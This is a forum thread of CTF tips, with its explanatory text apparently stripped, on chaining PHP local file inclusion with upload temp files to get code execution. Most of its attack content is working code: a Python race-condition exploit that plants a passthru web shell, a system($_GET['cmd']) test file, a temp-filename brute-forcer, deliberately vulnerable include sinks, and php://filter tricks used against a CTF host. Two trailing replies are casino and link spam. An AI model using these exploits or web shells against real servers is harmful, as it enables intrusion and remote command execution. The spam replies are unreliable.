
MtucX 13-07-2020 09:31 AM

ctf tips & tricks
 











CTF TIPS & TRICKS


ctf

https://www.sec4ever.com/home/showthread.php?t=19843

# LFI WITH TMP FILES

## Understanding PHP temporary files



https://www.php.net/manual/en/featur...ost-method.php

https://www.macs.hw.ac.uk/~hwloidl/d...le-upload.html

POST put method
, , global variables $_files



https://h4dla3.github.io/images/2020-07-10_094131.png



https://arabicprogrammer.com/article/8708534101/

default temp dir

by default

php.ini

https://h4dla3.github.io/images/2020-07-10_105221.png

d:/phpstudy_pro/temp

; upload_tmp_dir

wamp c:/wamp/tmp

php.ini

ubuntu

:

cat /etc/php/7.0/apache2/php.ini | grep upload_tmp
;upload_tmp_dir =

If upload_tmp_dir is unset or not writable, PHP falls back to the system default temp dir.



upload_tmp_dir

temp directory

sys_get_temp_dir()
:

default

C:\Users\lol>php -r "echo sys_get_temp_dir();"
C:\Users\lol\AppData\Local\Temp

edited
php.ini

sys_temp_dir = "D:/phpstudy_pro/temp"

C:\Users\lol>php -r "echo sys_get_temp_dir();"
D:/phpstudy_pro/temp
C:\Users\lol>

ubuntu

:

➜ ~ php -r "echo sys_get_temp_dir();"
/tmp
➜  ~

##


temp directory
: php+4 php+6

:


:

php
<?php
// tmpfile() creates a temporary file in the system temp dir; the 'uri'
// entry of the stream metadata is its on-disk path, which exposes the
// naming pattern (php????.tmp on Windows, php?????? on Linux, see below).
$file = tmpfile();
$path = stream_get_meta_data($file)['uri'];
print $path."\n";

windows


https://h4dla3.github.io/images/2020-07-10_121408.png



php????.tmp

tmp

linux


Linux

php??????


https://h4dla3.github.io/images/2020-07-10_123241.png



GetTempFileName()
and mkstemp()



https://stackoverflow.com/questions/...-php-generated

https://linux.die.net/man/3/mktemp

https://linux.die.net/man/3/mkstemp

https://stackoverflow.com/questions/...ame-uniqueness

https://github.com/php/php-src/blob/...mporary_file.c

PHP_LFI_rfc1867_temporary_files




PHP POST.


https://h4dla3.github.io/images/2020-07-10_110539.png



https://h4dla3.github.io/images/2020-07-10_1105391.png

php

form request

###

php

crash .

##

1 - lfi


2 - /proc/self/fd/* * 10 . .


3 - . FindFirstFile method
fimap

https://github.com/kurobeats/fimap/w...rstFileExploit

## Exploiting time




## LFI With PHPInfo Assistance


https://insomniasec.com/cdn-assets/L...Assistance.pdf

http://gynvael.coldwind.pl/download....rary_files.pdf


local file include
....
phpinfo() script



:

index.php

php
<?php
// Deliberately vulnerable include sink for the walkthrough: the path comes
// straight from the query string with no validation, so any readable file
// (including PHP's own upload temp files) can be included and executed.
include($_GET['file']);
?>

:

info.php
php
<?php
// phpinfo() dumps the current request's $_FILES array, including the
// tmp_name path of an in-flight upload. That disclosure is the information
// leak the script below depends on; an exposed phpinfo() page is itself
// the finding to fix.
phpinfo();
?>

PHP .


https://h4dla3.github.io/images/2020-07-09_214428.png

https://h4dla3.github.io/images/2020-07-09_214614.png


upload post phpinfo

LFI


php

race condition.



:

python
import requests
import ssl
import socket
import urllib3

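def SubstrFind(resp, toFind):
        """Return every index at which *toFind* occurs in *resp*.

        Occurrences may overlap (e.g. "aa" in "aaa" gives [0, 1]), matching
        what the original character-by-character scan produced.

        Args:
            resp: the text to search.
            toFind: the substring to look for.

        Returns:
            A list of start indexes in increasing order; empty when *toFind*
            is empty or longer than *resp*.
        """
        # An empty needle used to index toFind[0] and raise IndexError;
        # report "no match" instead.
        if not toFind or len(toFind) > len(resp):
                return []
        return [i for i in range(len(resp) - len(toFind) + 1)
                if resp.startswith(toFind, i)]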

def phpinfo_ext(content):
        """Extract the text following the first "Security Test" marker in *content*.

        Reading starts 11 characters after the marker and stops at the first
        '<'. Returns "" when the marker is not present.

        NOTE(review): the marker is 13 characters long, so the +11 offset
        keeps its last two characters in the result; preserved as-is since
        nothing on this page calls the function — confirm against the caller.
        """
        hits = SubstrFind(content, "Security Test")
        if not hits:
                return ""
        tail = content[hits[0] + 11:]
        cut = tail.find('<')
        return tail if cut < 0 else tail[:cut]

def phpinfo_request():
        """Make one attempt at the phpinfo()-assisted temp-file include.

        Sends a hand-built multipart POST to /info.php whose "upload" body
        is TAG followed by a PHP snippet, reads the phpinfo() response until
        the $_FILES tmp_name entry shows up, then requests
        index.php?file=<tmp_name> and looks for TAG in that page.

        Returns:
            "" on a miss (``got`` is never assigned anything else). On a hit
            it prints "done" and calls exit() instead of returning.

        Python 2 code: print statements and str-based socket I/O throughout.
        The raw socket taken from urllib3 is never closed.
        """
        TAG="Security Test"
        # Upload content: the TAG marker, then PHP that writes /tmp/ccc.
        # TAG is what the final check on the included page looks for.
        PAYLOAD="""%s\r
<?php $c=fopen('/tmp/ccc','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
        # One multipart part named "dummyname", filename test.txt.
        REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
        # 6000 'A's placed in several request headers; presumably meant to
        # enlarge the phpinfo() output so the tmp_name part is flushed early
        # (see the linked insomniasec paper) — not verified here.
        padding="A" * 6000
        # Two adjacent triple-quoted literals are concatenated: the request
        # line is "POST /info.php HTTP/1.1". Content-Length is computed from
        # the body so the multipart request is well-formed.
        REQ1="""POST /info.php"""""" HTTP/1.1\r
Z: """+padding+"""\r
Cookie: othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: 127.0.0.1\r
\r
%s""" %(len(REQ1_DATA),REQ1_DATA)

        got = ""
        # Borrow urllib3's connection object only to get a connected raw
        # socket; the request itself is written by hand so the response can
        # be read incrementally.
        sc = urllib3.connection_from_url('http://127.0.0.1')._new_conn()
        sc.connect()
        sc = sc.sock

        payload = REQ1
        sc.send(payload)

        # Read until the tmp_name entry appears or the server closes the
        # connection (recv returns '').
        resp = ''
        while 'tmp_name' not in resp:
                x = sc.recv(4096)
                if x == '':
                        break
                resp += x
        if("tmp_name" in resp):
                found = 1  # unused
                lines = resp.split('\n')
                # phpinfo() prints "[tmp_name] => /path"; whitespace-split
                # index 2 is the path. If no line contains "tmp_name]" the
                # tmp_name name below is unbound and raises NameError.
                for line in lines:
                        if "tmp_name]" in line:
                                mystr = str(line)
                                array = mystr.split()
                                tmp_name = array[2]
                                print(tmp_name)
                                break
                # The include sink from index.php above; the temp file only
                # exists while the POST is still being processed, hence the
                # race this function is retried in a loop for.
                tmp_url = "http://127.0.0.1/index.php?file=" + tmp_name
                r = requests.get(tmp_url)#

                content = r.content
                if 'Security Test' in content:
                        print "done"
                        exit()
                else:
                        print('wait ... ')

        return got
               


# Retry forever: phpinfo_request() calls exit() on a hit, so this loop ends
# only there or on an interrupt; each miss prints "" (its return value).
while True:
        print(phpinfo_request())

:

bash
sudo inotifywait -m -r /tmp

https://h4dla3.github.io/images/2020-07-10_153338.png


ccc






https://h4dla3.github.io/images/2020-07-10_154005.png

ctf challenge : https://h4dla3.github.io/post/eagle-jump/

docker container : https://github.com/vulhub/vulhub/tre.../php/inclusion


## ( php7 segment fault ) using php://filter/string.strip_tags


https://bugs.php.net/bug.php?id=75535

php

php7.0.0-7.1.2

php7.1.3-7.2.1

php7.2.2-7.2.8


lfi
php://filter/string.strip_tags
php
crash

( )


upload_tmp_dir
directory
.


segment fault
null pointer dereference


. `atoi(NULL)`







https://h4dla3.github.io/images/2020-07-10_173120.png

crash

https://h4dla3.github.io/images/2020-07-10_173327.png




:

php
<?php
// Same unvalidated include sink as before; here it is fed the
// php://filter/string.strip_tags path that crashes the affected PHP 7
// versions, leaving the upload temp file behind in upload_tmp_dir.
include($_GET['file']);
?>


browser



https://h4dla3.github.io/images/2020-07-10_172649.png







https://h4dla3.github.io/images/2020-07-10_153338.png

https://h4dla3.github.io/images/2020-07-10_1105391.png







:

mtucx.txt

php
<?php
// Planted test file: the 'mtucx' echo is the marker the brute-force script
// below searches for in the response. The closing tag appears as `>` here,
// presumably a transcription of `?>`.
echo 'mtucx';
system($_GET['cmd']);
>

https://h4dla3.github.io/images/2020-07-10_174146.png



2

crash





https://h4dla3.github.io/images/2020-07-10_174402.png

tmp filename



burp wfuzz gobuster dirbuster ... etc





https://h4dla3.github.io/images/2020-07-10_200751.png





python script
:

python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests, random
import datetime

# Alphabet for the random suffix: ASCII letters and digits, matching the
# php?????? temp-file pattern noted earlier on the page.
charset = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"

# Base URL of the host whose index.php?lfi= include sink is being tested.
base_url = "http://127.0.0.1"

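def get_filename(length=6, alphabet=None):
    """Return a random string of *length* characters drawn from *alphabet*.

    Args:
        length: number of characters to produce; defaults to 6, the length
            of the random suffix in the php?????? temp-file names.
        alphabet: characters to choose from; defaults to the module-level
            ``charset``.

    Returns:
        A str of exactly *length* characters. Uses ``random.choice``, so the
        output is reproducible under ``random.seed``.
    """
    pool = charset if alphabet is None else alphabet
    return "".join(random.choice(pool) for _ in range(length))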

def brute_force_tmp_files():
    """Try one random /tmp/php?????? name through the index.php?lfi= include.

    Builds a candidate path from get_filename(), requests it, and looks for
    the 'mtucx' marker (the string the planted mtucx.txt echoes) in the
    response body. On a hit it prints the URL and calls exit(); otherwise it
    returns None. Any exception from the request is swallowed, so connection
    errors are silently retried by the caller's loop.

    Python 2 code (print statements).
    """
    filename = get_filename()
    url = "{}/index.php?lfi=/tmp/php{}".format(base_url, filename)
    print "php" + filename
    try:
        r = requests.get(url)
        if 'mtucx' in r.text:
            print "[+] Include success!"
            print url
            exit()
    except Exception as e:
        # Broad catch: timeouts, refused connections, etc. are ignored and
        # the next candidate is tried; `e` is never used.
        pass


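def main():
    """Keep trying random temp-file names until brute_force_tmp_files() exits.

    brute_force_tmp_files() calls exit() on a hit, so this loop ends only
    there or on an interrupt. The unused ``flag`` local and the no-op
    ``pass`` of the original are dropped.
    """
    while True:
        brute_force_tmp_files()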


# Script entry point: run the loop only when executed directly, not on import.
if __name__ == "__main__":
    main()

burpsuite
burpsuite

https://h4dla3.github.io/images/2020-07-10_200156.png




....

https://h4dla3.github.io/images/2020-07-10_204834.png

# ctf

fuzz

https://h4dla3.github.io/images/2020-07-10_191555.png

dir.php




https://h4dla3.github.io/images/2020-07-10_191636.png


md5 ==

pass=md5(??)&



https://h4dla3.github.io/images/2020-07-10_191803.png



:

bash
C:\Users\lol\Desktop\ffuf_1.0.2_windows_amd64>python -c "print len('fa25e54758d5d5c1927781a6ede89f8a')"
32

C:\Users\lol\Desktop\ffuf_1.0.2_windows_amd64>


32 32 == md5



https://h4dla3.github.io/images/2020-07-10_192103.png

redirect
flflflflfag.php



https://h4dla3.github.io/images/2020-07-10_192159.png

lfi

php://filter/convert.base64-encode/resource=



:

http://61da71ac-e4d7-4eac-96c2-58cbde529147.node3.buuoj.cn/flflflflag.php?file=php://filter/convert.base64-encode/resource=flflflflag.php

http://61da71ac-e4d7-4eac-96c2-58cbde529147.node3.buuoj.cn/flflflflag.php?file=php://filter/convert.base64-encode/resource=dir.php


decode base64

:

php
flflflflag.php

<?php
// CTF target: includes a user-controlled path after a denylist check.
$file=$_GET['file'];
// Rejects any value containing "data", "input" or "zip" (case-insensitive),
// which covers the data:, php://input and zip:// wrappers — but "filter" is
// not matched, so php://filter/convert.base64-encode/... (used above to
// read this file and dir.php) passes. Denylists on wrapper names leave
// every unlisted wrapper open; an allowlist of includable files is the fix.
if(preg_match('/data|input|zip/is',$file)){
        die('nonono');
}
// '@' suppresses include warnings, so a failed include is silent.
@include($file);
echo 'include($_GET["file"])';
?>

dir.php

<?php
// Lists /tmp. scandir is not actually disabled: in the disable_functions
// value quoted below it appears misspelled as "scadnir", so the hardening
// entry has no effect and this call still runs.
var_dump(scandir('/tmp'));

flflflflag.php
data ....
dir.php tmp directory

https://h4dla3.github.io/images/2020-07-10_191736.png





https://h4dla3.github.io/images/2020-07-10_192525.png



https://h4dla3.github.io/images/2020-07-10_192556.png

dir.php


https://h4dla3.github.io/images/2020-07-10_192654.png

include

https://h4dla3.github.io/images/2020-07-10_192727.png

disable function

:

disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,scadnir,readfile,show_source,fpassthru,readdir
eval
https://h4dla3.github.io/images/2020-07-10_192923.png

https://h4dla3.github.io/images/2020-07-10_193037.png



https://h4dla3.github.io/images/2020-07-10_193822.png

## 3 ( convert.quoted-printable-encode )


...

RobertFralo 30-07-2020 01:22 PM

: ctf tips & tricks
 
online casino GunsBet https://gunsbet.xyz

Zacesebaqoo 11-08-2020 08:37 PM

: ctf tips & tricks
 
. , . , . , . , , .
.
.
, . . , . bcpl , .
. , , , , . , , , .
, , , , , . . . , , .
, , . , , , , , , . , .
, , .
, 10 , , , , , .
, , . , , , , .




http://www.schluessel-herrin.com/for...d.php?p=218920
http://atcheats.com/showthread.php?tid=156571
http://www.multiple-avenues.com/foru...-Card-Discount
http://dl3modern.com/vb/showthread.php?p=1206887
http://forum.muhanoixua.com.vn/showt...9A%D0%A1%D0%82
http://moussa-sror.com/vb/showthread.php?p=222543
http://dankgaminginc.com/showthread.php?tid=82040
http://aldradach.drachenfest.info/fo...?f=18&t=606025
http://188.128.165.51/forum_Asdasd/v...f=25&t=1013749
http://188.128.165.51/forum_Asdasd/v...?f=25&t=601300

